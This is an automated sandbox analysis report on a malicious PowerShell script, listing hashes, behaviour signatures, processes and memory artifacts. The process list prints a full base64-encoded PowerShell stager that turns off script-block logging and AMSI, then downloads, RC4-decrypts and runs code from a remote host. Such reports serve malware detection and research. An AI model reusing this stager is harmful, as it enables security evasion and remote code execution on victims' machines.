Analysis
-
max time kernel
17s -
max time network
112s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
14-10-2020 20:25
General
-
Target
9c328a584d6a90bbe94e13730d0cf62bafaf360ad6ef74f6655f1541d21f787e.ps1
-
Size
5KB
-
MD5
59ff315119e0fa26a73a334a489a135c
-
SHA1
bd75267ae8f3a87fe205497d841ec0cc325649a0
-
SHA256
b195af69564d51cf3a6f26b6058f85d0bff09f0f2268e807ab4b50f458e06ca6
-
SHA512
798193588b099d6990539ac5f4d76681f13cb82c65ba9cd17ca8132dad75403314450cb62b97bc869d7b8dccb32af3a25df92c7dc542b409eb9d274c40d5df5f
Score
8/10
Malware Config
Signatures
-
Blacklisted process makes network request 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\9c328a584d6a90bbe94e13730d0cf62bafaf360ad6ef74f6655f1541d21f787e.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAcwBJAE8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAUwBJAE8AbgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJAA5ADMAOQA9AFsAcgBlAEYAXQAuAEEAcwBzAEUAbQBiAEwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkAZQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAA5ADMAOQApAHsAJAA3ADkAMAA9ACQAOQAzADkALgBHAGUAdABWAGEAbAB1AEUAKAAkAE4AdQBsAGwAKQA7AEkARgAoACQANwA5ADAAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA3ADkAMABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA3ADkAMABbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBMAD0AWwBDAE8AbABsAGUAYwB0AGkATwBOAHMALgBHAEUAbgBFAFIAaQBDAC4ARABpAGMAdABpAG8AbgBBAFIAeQBbAHMAdAByAEkATgBHACwAUwB5AHMAdABFAE0ALgBPAGIASgBlAEMAdABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBhAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA3ADkAMABbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJAB2AEEAbAB9AEUATABzAGUAewBbAFMAYwByAGkAcAB0AEIATABvAEMAawBdAC4AIgBHAEUAdABGAGkAZQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBBAEwAVQBFACgAJABuAFUATABMACwAKABOAEUAVwAtAE8AQgBqAGUAYwBUACAAQwBvAEwATABlAEMAdABJAG8AbgBzAC4ARwBlAG4ARQBSAGkAYwAuAEgAYQBzAGgAUwBlAFQAWwBzAHQAcgBJAE4ARwBdACkAKQB9ACQAUgBFAGYAPQBbAFIAZQBGAF0ALgBBAHMAUwBlAG0AYgBMAHkALgBHAGUAVABUAHkAUABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUAZgAuAEcARQB0AEYASQBlAEwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAEwAdQBlACgAJABOAFUAbABsACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAFkAUwBUAGUAbQAuAE4ARQB0AC4AUwBlAHIAdgBJAEMARQBQAG8ASQBuAHQATQBhAG4AQQBnAGUAUgBdADoAOgBFAFgAcABlAEMAdAAxADAAMABDAG8ATgBUAGkATgBVAGUAPQAwADsAJAA1ADUAZgA9AE4AZQBXAC0ATwBiAGoARQBDAHQAIABTAFkAcwB0AGUAbQAuAE4AZQB0AC4AVwBFAEIAQwBsAEkAZQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAG4AYwBvAEQAaQBOAEcAXQA6ADoAVQBOAGkAQwBvAGQARQAuAEcARQB0AFMAdABSAGkATgBHACgAWwBDAG8ATgBWAEUAUgBUAF0AOgA6AEYAUgBPAE0AQgBBAHMAZQA2ADQAUwB0AHIAaQBuAEcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAVQBBAFoAUQBCAHoAQQBHAHMAQQBiAHcAQgB3AEEARwBnAEEAYQBRAEIAegBBAEcAZwBBAGEAUQBCAHUAQQBHAGMAQQBZAHcAQgBoAEEARwAwAEEAYwBBAEIAaABBAEcAawBBAFoAdwBCAHUAQQBFAEUAQQBVAEEAQgBVAEEARABFAEEATQB3AEEAegBBAEQAYwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA2AEEARABnAEEATQBBAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAA1ADUAZgAuAEgAZQBhAGQARQByAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkADUANQBmAC4AUAByAG8AeABZAD0AWwBTAFkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAUgBFAHEAdQBFAHMAdABdADoAOgBEAEUAZgBhAHUAbAB0AFcARQBiAFAAUgBPAHgAWQA7ACQANQA1AEYALgBQAFIAbwBYAHkALgBDAHIAZQBEAEUAbgB0AGkAYQBsAHMAIAA9ACAAWwBTAFkAUwBUAEUAbQAuAE4AZQB0AC4AQwBSAGUARABFAG4AVABpAGEATABDAEEAQwBIAGUAXQA6ADoARABlAEYAYQB1AGwAdABOAEUAVAB3AG8AUgBrAEMAUgBFAGQAZQBuAHQAaQBhAGwAcwA7ACQAUwBjAHIAaQBwAHQAOgBQAHIAbwB4AHkAIAA9ACAAJAA1ADUAZgAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABlAE0ALgBUAEUAeABUAC4ARQBOAGMAbwBkAEkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAcwAoACcAeABZAGsAZgBEAEAAbwBwACMAKwBTAHYANQBlAFoAVwBxADYASgAlAGwALwBWAGkAPwBfAGcAQQBYAEcAPgBDACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQANQA1AGYALgBIAGUAYQBEAEUAUgBzAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAFMAUABpAFkAZwBPAGYAPQBZAHYAcgA0AGMANwA1AGsAQwBZADYANQBlADMAQwBsADEALwAwADIAcQByAFoAQQBuAC8AYwA9ACIAKQA7ACQAZABhAHQAYQA9ACQANQA1AGYALgBEAE8AVwBuAGwAbwBBAGQARABBAHQAYQAoACQAcwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAGEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABhAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAdABhAC4AbABFAG4AZwB0AEgAXQA7AC0ASgBPAGkAbgBbAEMAaABhAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=2⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
d737fc27bbf2f3bd19d1706af83dbe3f
SHA1212d219394124968b50769c371121a577d973985
SHA256b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
b55a48eca7fdc7f291e13406a8d0389f
SHA11d12bc805e3447494c65e8a8711ee28285d72001
SHA256909b5ef42aa6ef0ee79e78308803d0587a8d8f8cab0f31fe22bb531debd72654
SHA5122ff4e42704f31d7535560d87fb7ca6cd7d957b401f56e3b6659581aefb8163dab78f04eb14a55a860e2a1d42779e62f7dca6aff2258efbd26d8a05c3e4069624
-
memory/516-0-0x00007FFEAE2E0000-0x00007FFEAECCC000-memory.dmpFilesize
9.9MB
-
memory/516-1-0x0000027DF0620000-0x0000027DF0621000-memory.dmpFilesize
4KB
-
memory/516-2-0x0000027DF07D0000-0x0000027DF07D1000-memory.dmpFilesize
4KB
-
memory/3984-3-0x0000000000000000-mapping.dmp
-
memory/3984-4-0x00007FFEAE2E0000-0x00007FFEAECCC000-memory.dmpFilesize
9.9MB